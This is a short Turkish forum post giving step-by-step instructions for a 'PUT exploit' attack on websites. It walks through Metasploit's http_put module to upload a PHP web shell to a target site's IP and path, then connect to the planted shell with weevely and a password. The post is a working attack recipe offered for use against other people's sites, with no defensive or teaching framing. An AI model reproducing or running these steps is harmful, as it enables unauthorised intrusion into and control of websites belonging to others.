PUT Exploit saldırısı

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Katılım
23 Mar 2020
Tepki puanı
8
Rating - 0%
Eğer put exploit açığı bulduğunuz bir site varsa göstereceğim adımları uygulayın.

Msfconsol programını açın..

msf > use auxiliary/scanner/http/http_put
msf > set rhosts "HEDEF SİTENİN İP ADRESİ" /ÖRNEK : set rhosts 192.168.45.31
msf > set path "AÇIĞIN OLDUĞU YER" / ÖRNEK : set path /get/
msf > set filename "SHELL DOSYASI" / ÖRNEK : set filename makassar.php
msf > set filedata file://root/Desktop/shell2.php / Siz eğer parrot vs kullanıyorsanız (cd desktop yazın ve sonra pwd yazın /User/root/Desktop/shell2.php)
msf > exploit

İŞLEM OLDUKTAN SONRA : ~# weevely http://hedefsite.com/path/makassar.php "ŞİFRE" / ÖRNEK : weevely http://hedefsite.com/path/makassar.php 12345

Ve işlem tamamlanmıştır.
 
  • Like
Tepkiler: WyX
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
131,613Konular
3,269,700Mesajlar
315,574Kullanıcılar
leitessSon Üye
Üst Alt